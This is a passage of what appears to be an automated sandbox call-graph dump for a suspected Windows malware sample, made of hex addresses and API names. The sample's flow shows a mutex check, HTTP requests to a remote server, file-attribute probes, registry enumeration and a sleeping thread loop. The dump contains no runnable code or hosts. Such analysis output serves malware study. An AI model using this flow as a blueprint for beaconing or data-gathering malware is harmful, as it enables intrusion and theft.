bdbe30 36419->36695 36421 bde7fe 36422 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36421->36422 36423 bde813 36422->36423 36424 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36423->36424 36425 bde82b 36424->36425 36426 bd5c10 5 API calls 36425->36426 36427 bde832 36426->36427 36722 bd8580 36427->36722 36429 bde83e 36430 bdea8f Concurrency::details::ContextBase::GetArbitraryAlias __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 36429->36430 36431 c06c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36429->36431 36430->36331 36432 bdeabd 36431->36432 36433 c06c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36432->36433 36434 bdeac2 36433->36434 36435 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36434->36435 36436 bdeb19 36435->36436 36437 bd5c10 5 API calls 36436->36437 36438 bdeb21 36437->36438 36731 be83c0 36438->36731 36440 bdeb36 36441 be8220 2 API calls 36440->36441 36442 bdeb45 GetFileAttributesA 36441->36442 36444 bdeb62 36442->36444 36445 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36444->36445 36446 bded60 36445->36446 36447 bd5c10 5 API calls 36446->36447 36448 bded68 36447->36448 36449 be83c0 2 API calls 36448->36449 36450 bded7d 36449->36450 36451 be8220 2 API calls 36450->36451 36452 bded8c GetFileAttributesA 36451->36452 36456 bdeda9 36452->36456 36454 be80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36454->36456 36455 bdf699 Concurrency::details::ContextBase::GetArbitraryAlias 36455->36331 36456->36454 36456->36455 36457 bdf6cb 36456->36457 36458 c06c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36457->36458 36459 bdf6d0 36458->36459 36460 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36459->36460 36461 bdf727 36460->36461 36462 bd5c10 5 API calls 36461->36462 36463 bdf72e 36462->36463 36464 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36463->36464 36465 bdf741 36464->36465 36466 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36465->36466 36467 bdf756 36466->36467 36468 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36467->36468 36469 bdf76b 36468->36469 36470 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36469->36470 36471 bdf77d 36470->36471 36472 bde530 11 API calls 36471->36472 36473 bdf786 36472->36473 36474 be80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36473->36474 36475 bdf7aa 36474->36475 36476 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36475->36476 36477 bdf7ba 36476->36477 36478 be80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36477->36478 36479 bdf7d7 36478->36479 36480 be80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36479->36480 36482 bdf7f0 36480->36482 36481 bdf982 Concurrency::details::ContextBase::GetArbitraryAlias __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 36481->36331 36482->36481 36483 c06c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36482->36483 36484 bdf9b0 36483->36484 36485 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36484->36485 36486 bdfa04 36485->36486 36487 bd5c10 5 API calls 36486->36487 36488 bdfa0b 36487->36488 36489 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36488->36489 36490 bdfa1e 36489->36490 36491 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36490->36491 36492 bdfa33 36491->36492 36493 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36492->36493 36494 bdfa48 36493->36494 36495 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36494->36495 36496 bdfa5a 36495->36496 36497 bde530 11 API calls 36496->36497 36499 bdfa63 36497->36499 36498 bdfb35 Concurrency::details::ContextBase::GetArbitraryAlias 36498->36331 36499->36498 36500 c06c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36499->36500 36501 bdfb54 36500->36501 36502 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36501->36502 36503 bdfba5 36502->36503 36739 bd9580 5 API calls 3 library calls 36503->36739 36505 bdfbb4 36740 bd9230 5 API calls 3 library calls 36505->36740 36507 bdfbc3 36508 be8320 2 API calls 36507->36508 36509 bdfbdb 36508->36509 36509->36509 36510 be80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36509->36510 36511 bdfc8c 36510->36511 36512 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36511->36512 36513 bdfca7 36512->36513 36514 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36513->36514 36515 bdfcb9 36514->36515 36516 bdc360 RtlAllocateHeap 36515->36516 36517 bdfcc2 36516->36517 36518 c06729 RtlAllocateHeap 36517->36518 36519 bdfce1 36518->36519 36520 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36519->36520 36521 be05d4 36520->36521 36522 bd5c10 5 API calls 36521->36522 36523 be05db 36522->36523 36524 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36523->36524 36525 be05f1 36524->36525 36526 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36525->36526 36527 be0609 36526->36527 36528 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36527->36528 36529 be0621 36528->36529 36530 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36529->36530 36531 be0633 36530->36531 36532 bde530 11 API calls 36531->36532 36534 be063c 36532->36534 36533 be0880 Concurrency::details::ContextBase::GetArbitraryAlias __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 36533->36331 36534->36533 36535 c06c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36534->36535 36536 be08d3 36535->36536 36537 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36536->36537 36538 be0987 36537->36538 36539 bd5c10 5 API calls 36538->36539 36540 be098e 36539->36540 36541 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36540->36541 36542 be09a4 36541->36542 36543 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36542->36543 36544 be09bc 36543->36544 36545 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36544->36545 36546 be09d4 36545->36546 36547 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36546->36547 36548 be12e0 36547->36548 36549 bde530 11 API calls 36548->36549 36550 be12e9 36549->36550 36551->36342 36554 c0667e __FrameHandler3::FrameUnwindToState 36552->36554 36553 c06685 36555 c075f6 __dosmaperr RtlAllocateHeap 36553->36555 36554->36553 36556 c066a5 36554->36556 36557 c0668a 36555->36557 36558 c066b7 36556->36558 36559 c066aa 36556->36559 36570 c06c5a RtlAllocateHeap __wsopen_s 36557->36570 36566 c0a8c3 36558->36566 36561 c075f6 __dosmaperr RtlAllocateHeap 36559->36561 36565 c06695 36561->36565 36563 c066c0 36564 c075f6 __dosmaperr RtlAllocateHeap 36563->36564 36563->36565 36564->36565 36565->36353 36567 c0a8cf __FrameHandler3::FrameUnwindToState 36566->36567 36571 c0a967 36567->36571 36569 c0a8ea 36569->36563 36570->36565 36575 c0a98a ___scrt_uninitialize_crt 36571->36575 36573 c0a9eb 36574 c0adf5 __freea RtlAllocateHeap 36573->36574 36576 c0a9d0 ___scrt_uninitialize_crt __wsopen_s 36574->36576 36575->36575 36575->36576 36577 c0d82f 36575->36577 36576->36569 36580 c0d83c _unexpected Concurrency::details::FairScheduleGroup::AllocateSegment 36577->36580 36578 c0d867 RtlAllocateHeap 36579 c0d87a __dosmaperr 36578->36579 36578->36580 36579->36573 36580->36578 36580->36579 36581->36362 36582->36362 36601 c0868d 36583->36601 36585 c0887a 36586 c088b3 36585->36586 36588 c0888f 36585->36588 36600 be104d 36585->36600 36609 c0690a 36586->36609 36589 c075f6 __dosmaperr RtlAllocateHeap 36588->36589 36590 c08894 36589->36590 36608 c06c5a RtlAllocateHeap __wsopen_s 36590->36608 36593 c088bf 36595 c088ee 36593->36595 36617 c06d52 4 API calls 2 library calls 36593->36617 36597 c08958 36595->36597 36618 c08a8d RtlAllocateHeap __dosmaperr __wsopen_s 36595->36618 36619 c08a8d RtlAllocateHeap __dosmaperr __wsopen_s 36597->36619 36598 c08a20 36599 c075f6 __dosmaperr RtlAllocateHeap 36598->36599 36598->36600 36599->36600 36600->36310 36600->36331 36602 c08692 36601->36602 36603 c086a5 36601->36603 36604 c075f6 __dosmaperr RtlAllocateHeap 36602->36604 36603->36585 36605 c08697 36604->36605 36620 c06c5a RtlAllocateHeap __wsopen_s 36605->36620 36607 c086a2 36607->36585 36608->36600 36610 c0692a 36609->36610 36616 c06921 36609->36616 36610->36616 36621 c0a671 3 API calls 3 library calls 36610->36621 36612 c0694a 36622 c0b5fb GetPEB GetPEB RtlAllocateHeap __fassign 36612->36622 36614 c06960 36623 c0b628 GetPEB GetPEB RtlAllocateHeap __fassign 36614->36623 36616->36593 36617->36593 36618->36597 36619->36598 36620->36607 36621->36612 36622->36614 36623->36616 36624->36373 36625->36378 36626->36368 36628 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36627->36628 36629 bd7465 36628->36629 36630 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36629->36630 36631 bd7478 36630->36631 36632 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36631->36632 36633 bd7488 36632->36633 36634 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36633->36634 36635 bd749d 36634->36635 36636 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36635->36636 36637 bd74b2 36636->36637 36638 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36637->36638 36639 bd74c4 Concurrency::details::ContextBase::GetArbitraryAlias __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 36638->36639 36671 be7f80 2 API calls 4 library calls 36640->36671 36642 bd596b 36643 bd59e0 36642->36643 36672 be7f80 2 API calls 4 library calls 36643->36672 36645 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36657 bd5a45 36645->36657 36646 bd5bdd __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 36646->36389 36647 bd5c09 36674 be8200 RtlAllocateHeap RtlAllocateHeap 36647->36674 36649 be80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36649->36657 36657->36645 36657->36646 36657->36647 36657->36649 36673 bd5730 RtlAllocateHeap RtlAllocateHeap Concurrency::details::ContextBase::GetArbitraryAlias __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z Concurrency::details::_CancellationTokenState::_RegisterCallback 36657->36673 36665 bd4dc2 36664->36665 36669 bd4b92 36664->36669 36665->36391 36667 bd4ce5 36667->36665 36677 be8ca0 2 API calls 4 library calls 36667->36677 36669->36667 36675 c06da6 GetPEB GetPEB RtlAllocateHeap RtlAllocateHeap __fassign 36669->36675 36676 be8ca0 2 API calls 4 library calls 36669->36676 36671->36642 36672->36657 36673->36657 36675->36669 36676->36669 36677->36667 36679 be9294 36678->36679 36682 be92a5 __InternalCxxFrameHandler std::_Rethrow_future_exception 36679->36682 36741 be94e0 2 API calls 4 library calls 36679->36741 36681 be932b 36681->36407 36682->36407 36684 be8339 36683->36684 36685 be834d __InternalCxxFrameHandler 36684->36685 36742 be8f40 2 API calls 4 library calls 36684->36742 36685->36409 36688 be8248 36687->36688 36689 be8292 36687->36689 36688->36689 36690 be8251 36688->36690 36691 be82a1 __InternalCxxFrameHandler 36689->36691 36743 be8f40 2 API calls 4 library calls 36689->36743 36692 be9280 2 API calls 36690->36692 36691->36411 36694 be825a 36692->36694 36694->36411 36696 bdc281 36695->36696 36697 bdbe82 36695->36697 36698 be80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36696->36698 36697->36696 36699 bdbe96 Sleep InternetOpenW InternetConnectA 36697->36699 36705 bdc22e Concurrency::details::ContextBase::GetArbitraryAlias 36698->36705 36700 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36699->36700 36701 bdbf18 36700->36701 36703 bd5c10 5 API calls 36701->36703 36702 bdc27c Concurrency::details::ContextBase::GetArbitraryAlias __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 36702->36421 36706 bdbf23 HttpOpenRequestA 36703->36706 36704 c06c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36708 bdc354 36704->36708 36705->36702 36705->36704 36711 bdbf4c Concurrency::details::ContextBase::GetArbitraryAlias 36706->36711 36709 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36710 bdbfb4 36709->36710 36712 bd5c10 5 API calls 36710->36712 36711->36709 36713 bdbfbf 36712->36713 36714 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36713->36714 36715 bdbfd8 36714->36715 36716 bd5c10 5 API calls 36715->36716 36717 bdbfe3 HttpSendRequestA 36716->36717 36719 bdc006 Concurrency::details::ContextBase::GetArbitraryAlias 36717->36719 36720 bdc08e InternetReadFile 36719->36720 36721 bdc0b5 __InternalCxxFrameHandler 36720->36721 36726 bd86a0 Concurrency::details::ContextBase::GetArbitraryAlias 36722->36726 36730 bd85d5 Concurrency::details::ContextBase::GetArbitraryAlias 36722->36730 36723 bd8767 36744 be8200 RtlAllocateHeap RtlAllocateHeap 36723->36744 36724 be80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36724->36730 36727 bd8740 Concurrency::details::ContextBase::GetArbitraryAlias __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 36726->36727 36728 c06c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36726->36728 36727->36429 36729 bd8771 36728->36729 36730->36723 36730->36724 36730->36726 36745 be7760 36731->36745 36733 be8439 36735 be8454 __InternalCxxFrameHandler 36733->36735 36759 be8f40 2 API calls 4 library calls 36733->36759 36738 be84a8 __InternalCxxFrameHandler 36735->36738 36760 be8f40 2 API calls 4 library calls 36735->36760 36737 be84ee 36737->36440 36738->36440 36739->36505 36740->36507 36741->36681 36742->36685 36743->36691 36746 be7864 Concurrency::details::ContextBase::GetArbitraryAlias std::_Rethrow_future_exception 36745->36746 36747 be777b 36745->36747 36746->36733 36747->36746 36748 be78f1 36747->36748 36752 be77ea 36747->36752 36753 be7811 36747->36753 36758 be77fb std::_Rethrow_future_exception 36747->36758 36761 be9270 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 36748->36761 36750 be78f6 36762 bd2480 RtlAllocateHeap RtlAllocateHeap ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 36750->36762 36752->36750 36755 bed3e2 Concurrency::details::FairScheduleGroup::AllocateSegment 2 API calls 36752->36755 36756 bed3e2 Concurrency::details::FairScheduleGroup::AllocateSegment 2 API calls 36753->36756 36753->36758 36754 be78fb 36755->36758 36756->36758 36757 c06c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36757->36748 36758->36746 36758->36757 36759->36735 36760->36737 36762->36754 36763 c0ac53 36768 c0aa29 36763->36768 36766 c0ac92 36769 c0aa48 36768->36769 36770 c0aa5b 36769->36770 36778 c0aa70 36769->36778 36771 c075f6 __dosmaperr RtlAllocateHeap 36770->36771 36772 c0aa60 36771->36772 36788 c06c5a RtlAllocateHeap __wsopen_s 36772->36788 36774 c0aa6b 36774->36766 36785 c11a9c 36774->36785 36775 c075f6 __dosmaperr RtlAllocateHeap 36776 c0ac41 36775->36776 36792 c06c5a RtlAllocateHeap __wsopen_s 36776->36792 36783 c0ab90 36778->36783 36789 c1132b GetPEB GetPEB RtlAllocateHeap __dosmaperr __wsopen_s 36778->36789 36780 c0abe0 36780->36783 36790 c1132b GetPEB GetPEB RtlAllocateHeap __dosmaperr __wsopen_s 36780->36790 36782 c0abfe 36782->36783 36791 c1132b GetPEB GetPEB RtlAllocateHeap __dosmaperr __wsopen_s 36782->36791 36783->36774 36783->36775 36793 c11461 36785->36793 36787 c11ab7 36787->36766 36788->36774 36789->36780 36790->36782 36791->36783 36792->36774 36796 c1146d __FrameHandler3::FrameUnwindToState 36793->36796 36794 c11474 36795 c075f6 __dosmaperr RtlAllocateHeap 36794->36795 36797 c11479 36795->36797 36796->36794 36798 c1149f 36796->36798 36811 c06c5a RtlAllocateHeap __wsopen_s 36797->36811 36802 c11a2e 36798->36802 36801 c11483 __wsopen_s 36801->36787 36812 c0698d 36802->36812 36804 c11a50 36815 c068ed 36804->36815 36807 c11a64 36809 c0adf5 __freea RtlAllocateHeap 36807->36809 36810 c11a96 36807->36810 36809->36810 36810->36801 36811->36801 36813 c0690a __fassign 3 API calls 36812->36813 36814 c0699f __wsopen_s 36813->36814 36814->36804 36860 c0683b 36815->36860 36818 c11abc 36877 c1180a 36818->36877 36820 c11ad9 36821 c11b07 36820->36821 36822 c11aee 36820->36822 36891 c0bf3a 36821->36891 36896 c075e3 RtlAllocateHeap __dosmaperr 36822->36896 36825 c11af3 36830 c075f6 __dosmaperr RtlAllocateHeap 36825->36830 36826 c11b0c 36827 c11b15 36826->36827 36828 c11b2c 36826->36828 36897 c075e3 RtlAllocateHeap __dosmaperr 36827->36897 36895 c11775 CreateFileW 36828->36895 36856 c11b00 36830->36856 36832 c11b1a 36834 c075f6 __dosmaperr RtlAllocateHeap 36832->36834 36833 c11be2 GetFileType 36836 c11c34 36833->36836 36837 c11bed 36833->36837 36834->36825 36835 c11bb7 36899 c075c0 RtlAllocateHeap __dosmaperr 36835->36899 36901 c0be85 RtlAllocateHeap __dosmaperr __wsopen_s 36836->36901 36900 c075c0 RtlAllocateHeap __dosmaperr 36837->36900 36838 c11b65 36838->36833 36838->36835 36898 c11775 CreateFileW 36838->36898 36841 c11baa 36841->36833 36841->36835 36844 c11bfb 36844->36825 36851 c075f6 __dosmaperr RtlAllocateHeap 36844->36851 36845 c11c55 36846 c11ca1 36845->36846 36902 c11984 4 API calls 2 library calls 36845->36902 36850 c11ca8 36846->36850 36904 c11522 4 API calls 2 library calls 36846->36904 36849 c11cd6 36849->36850 36853 c11ce4 36849->36853 36903 c0af48 RtlAllocateHeap __dosmaperr __wsopen_s 36850->36903 36851->36825 36853->36856 36905 c11775 CreateFileW 36853->36905 36855 c11d8b 36855->36856 36906 c075c0 RtlAllocateHeap __dosmaperr 36855->36906 36856->36807 36858 c11da1 36907 c0c04d RtlAllocateHeap __dosmaperr __wsopen_s 36858->36907 36861 c06863 36860->36861 36862 c06849 36860->36862 36863 c06889 __fassign 36861->36863 36864 c0686a 36861->36864 36873 c069cc RtlAllocateHeap __freea 36862->36873 36869 c0689f __fassign 36863->36869 36876 c069e6 RtlAllocateHeap RtlAllocateHeap __wsopen_s 36863->36876 36867 c06853 36864->36867 36874 c069e6 RtlAllocateHeap RtlAllocateHeap __wsopen_s 36864->36874 36867->36807 36867->36818 36869->36867 36875 c075c0 RtlAllocateHeap __dosmaperr 36869->36875 36871 c068ab 36872 c075f6 __dosmaperr RtlAllocateHeap 36871->36872 36872->36867 36873->36867 36874->36867 36875->36871 36876->36869 36878 c11845 36877->36878 36879 c1182b 36877->36879 36908 c1179a 36878->36908 36879->36878 36881 c075f6 __dosmaperr RtlAllocateHeap 36879->36881 36882 c1183a 36881->36882 36915 c06c5a RtlAllocateHeap __wsopen_s 36882->36915 36884 c1187d 36885 c118ac 36884->36885 36887 c075f6 __dosmaperr RtlAllocateHeap 36884->36887 36890 c118fa __wsopen_s 36885->36890 36917 c09b60 RtlAllocateHeap __dosmaperr __wsopen_s 36885->36917 36888 c118a1 36887->36888 36916 c06c5a RtlAllocateHeap __wsopen_s 36888->36916 36890->36820 36894 c0bf46 __FrameHandler3::FrameUnwindToState 36891->36894 36893 c0bf77 __wsopen_s 36893->36826 36894->36893 36919 c0bd14 36894->36919 36895->36838 36896->36825 36897->36832 36898->36841 36899->36825 36900->36844 36901->36845 36902->36846 36903->36856 36904->36849 36905->36855 36906->36858 36907->36856 36910 c117b2 36908->36910 36909 c117cd 36909->36884 36910->36909 36911 c075f6 __dosmaperr RtlAllocateHeap 36910->36911 36912 c117f1 36911->36912 36918 c06c5a RtlAllocateHeap __wsopen_s 36912->36918 36914 c117fc 36914->36884 36915->36878 36916->36885 36917->36890 36918->36914 36920 c0d82f _unexpected RtlAllocateHeap 36919->36920 36923 c0bd26 __wsopen_s 36920->36923 36921 c0adf5 __freea RtlAllocateHeap 36922 c0bd88 36921->36922 36922->36893 36923->36921 36924 bd9ba5 GetFileAttributesA 36927 bd9bb5 Concurrency::details::ContextBase::GetArbitraryAlias 36924->36927 36925 bd9c80 Concurrency::details::ContextBase::GetArbitraryAlias 36931 be80c0 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 36925->36931 36926 bda91c 36928 bda953 Sleep CreateMutexA 36926->36928 36929 c06c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 36926->36929 36927->36925 36927->36926 36934 bda98e 36928->36934 36929->36928 36932 bda903 36931->36932 36933 bda9a7 36934->36933 36937 c06629 GetPEB GetPEB RtlAllocateHeap __FrameHandler3::FrameUnwindToState 36934->36937 36936 bda9b0 36937->36936 36952 c06dda 36953 c06df6 36952->36953 36954 c06de8 36952->36954 36956 c0698d __wsopen_s 3 API calls 36953->36956 36955 c06e4c 9 API calls 36954->36955 36957 c06df2 36955->36957 36958 c06e10 36956->36958 36959 c068ed __wsopen_s 2 API calls 36958->36959 36960 c06e1d 36959->36960 36962 c06e24 36960->36962 36965 c06e4c 36960->36965 36963 c0adf5 __freea RtlAllocateHeap 36962->36963 36964 c06e46 36962->36964 36963->36964 36966 c06e77 ListArray 36965->36966 36967 c06e5a 36965->36967 36971 c06eb9 CreateFileW 36966->36971 36972 c06e9d 36966->36972 37009 c075e3 RtlAllocateHeap __dosmaperr 36967->37009 36969 c06e5f 36970 c075f6 __dosmaperr RtlAllocateHeap 36969->36970 36975 c06e67 36970->36975 36973 c06eeb 36971->36973 36974 c06edd 36971->36974 37011 c075e3 RtlAllocateHeap __dosmaperr 36972->37011 37013 c06f2a GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap __dosmaperr 36973->37013 36988 c06fb4 GetFileType 36974->36988 37010 c06c5a RtlAllocateHeap __wsopen_s 36975->37010 36977 c06ea2 36981 c075f6 __dosmaperr RtlAllocateHeap 36977->36981 36983 c06ea9 36981->36983 36982 c06e72 36982->36962 37012 c06c5a RtlAllocateHeap __wsopen_s 36983->37012 36984 c06ee6 ListArray 36986 c06eb4 36984->36986 36987 c06f1c CloseHandle 36984->36987 36986->36962 36987->36986 36989 c06fef 36988->36989 36991 c070a1 36988->36991 36992 c07009 ListArray 36989->36992 37028 c0732a RtlAllocateHeap __dosmaperr 36989->37028 36994 c070be 36991->36994 36995 c070af 36991->36995 36998 c07098 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 36991->36998 36993 c07028 GetFileInformationByHandle 36992->36993 36992->36998 36993->36994 36996 c0703e 36993->36996 37030 c075c0 RtlAllocateHeap __dosmaperr 36994->37030 36997 c075f6 __dosmaperr RtlAllocateHeap 36995->36997 37014 c0727c 36996->37014 36997->36998 36998->36984 37003 c0705b 37004 c07124 SystemTimeToTzSpecificLocalTime 37003->37004 37005 c0706e 37004->37005 37006 c07124 SystemTimeToTzSpecificLocalTime 37005->37006 37007 c07085 37006->37007 37029 c07249 RtlAllocateHeap __dosmaperr 37007->37029 37009->36969 37010->36982 37011->36977 37012->36986 37013->36984 37015 c07292 _wcsrchr 37014->37015 37018 c0704a 37015->37018 37031 c0bc13 GetPEB GetPEB RtlAllocateHeap __dosmaperr __wsopen_s 37015->37031 37017 c072d6 37017->37018 37032 c0bc13 GetPEB GetPEB RtlAllocateHeap __dosmaperr __wsopen_s 37017->37032 37024 c07124 37018->37024 37020 c072e7 37020->37018 37033 c0bc13 GetPEB GetPEB RtlAllocateHeap __dosmaperr __wsopen_s 37020->37033 37022 c072f8 37022->37018 37034 c0bc13 GetPEB GetPEB RtlAllocateHeap __dosmaperr __wsopen_s 37022->37034 37025 c0713c 37024->37025 37026 c0715c SystemTimeToTzSpecificLocalTime 37025->37026 37027 c07142 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 37025->37027 37026->37027 37027->37003 37028->36992 37029->36998 37030->36998 37031->37017 37032->37020 37033->37022 37034->37018 37035 bed762 37036 bed76e __FrameHandler3::FrameUnwindToState 37035->37036 37056 bed488 37036->37056 37038 bed8ce ___scrt_fastfail 37077 c06629 GetPEB GetPEB RtlAllocateHeap __FrameHandler3::FrameUnwindToState 37038->37077 37040 bed8db 37078 c065ed GetPEB GetPEB RtlAllocateHeap __FrameHandler3::FrameUnwindToState 37040->37078 37042 bed8e3 ___security_init_cookie 37044 bed8e9 __scrt_common_main_seh 37042->37044 37043 bed7be 37045 bed83f 37060 c095bc 37045->37060 37046 bed775 ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 37046->37038 37046->37043 37046->37045 37076 c06603 GetPEB GetPEB RtlAllocateHeap __FrameHandler3::FrameUnwindToState _unexpected 37046->37076 37049 bed845 37064 be6d30 37049->37064 37057 bed491 37056->37057 37059 bed4a6 ___scrt_uninitialize_crt 37057->37059 37079 c09a28 37057->37079 37059->37046 37061 c095c5 37060->37061 37062 c095ca 37060->37062 37103 c09320 GetPEB GetPEB RtlAllocateHeap RtlAllocateHeap 37061->37103 37062->37049 37104 bda960 Sleep CreateMutexA 37064->37104 37068 be6d45 37069 bdd6d0 6 API calls 37068->37069 37070 be6d4a 37069->37070 37071 be4fc0 7 API calls 37070->37071 37072 be6d4f 37071->37072 37073 bd6020 RegOpenKeyExA RegEnumValueA RtlAllocateHeap RtlAllocateHeap 37072->37073 37074 be6d54 37073->37074 37075 bd6020 RegOpenKeyExA RegEnumValueA RtlAllocateHeap RtlAllocateHeap 37074->37075 37075->37074 37076->37045 37077->37040 37078->37042 37082 c0ee7e 37079->37082 37083 c0ee8e 37082->37083 37084 c09a37 37082->37084 37083->37084 37086 c0c54b 37083->37086 37084->37059 37087 c0c557 __FrameHandler3::FrameUnwindToState 37086->37087 37092 c0bdc4 37087->37092 37089 c0c56d 37091 c0c577 37089->37091 37101 c0c3e1 RtlAllocateHeap 37089->37101 37091->37083 37093 c0bdd0 __FrameHandler3::FrameUnwindToState 37092->37093 37094 c0bdd9 37093->37094 37100 c0bdfa __FrameHandler3::FrameUnwindToState 37093->37100 37095 c075f6 __dosmaperr RtlAllocateHeap 37094->37095 37096 c0bdde 37095->37096 37102 c06c5a RtlAllocateHeap __wsopen_s 37096->37102 37098 c0bde8 37098->37089 37099 c0bd14 __wsopen_s RtlAllocateHeap 37099->37100 37100->37098 37100->37099 37101->37091 37102->37098 37103->37062 37106 bda98e 37104->37106 37105 bda9a7 37109 bdce40 37105->37109 37106->37105 37114 c06629 GetPEB GetPEB RtlAllocateHeap __FrameHandler3::FrameUnwindToState 37106->37114 37108 bda9b0 37110 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37109->37110 37111 bdce92 37110->37111 37112 bd5c10 5 API calls 37111->37112 37113 bdce9d 37112->37113 37114->37108 37129 be6d00 CreateThread 37130 be6d20 Sleep 37129->37130 37131 be6c70 37129->37131 37130->37130 37134 be6ca0 37131->37134 37132 be7a00 RtlAllocateHeap RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 37132->37134 37133 bd5c10 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap RtlAllocateHeap 37133->37134 37134->37132 37134->37133 37137 be47b0 37134->37137 37136 be6cec Sleep 37136->37134 37138 be47eb 37137->37138 37140 be4ee3 Concurrency::details::ContextBase::GetArbitraryAlias 37137->37140 37139 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37138->37139 37138->37140 37142 be480c 37139->37142 37141 be4f59 Concurrency::details::ContextBase::GetArbitraryAlias __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 37140->37141 37143 c06c6a Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37140->37143 37141->37136 37144 bd5c10 5 API calls 37142->37144 37145 be4fba 37143->37145 37146 be4813 37144->37146 37147 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37146->37147 37148 be4825 37147->37148 37149 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37148->37149 37150 be4837 37149->37150 37151 bdbe30 11 API calls 37150->37151 37152 be4843 37151->37152 37153 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37152->37153 37154 be4858 37153->37154 37155 be7a00 Concurrency::details::_CancellationTokenState::_RegisterCallback 2 API calls 37154->37155 37156 be4870 37155->37156 37157 bd5c10 5 API calls 37156->37157 37158 be4877 37157->37158 37159 bd8580 2 API calls 37158->37159 37160 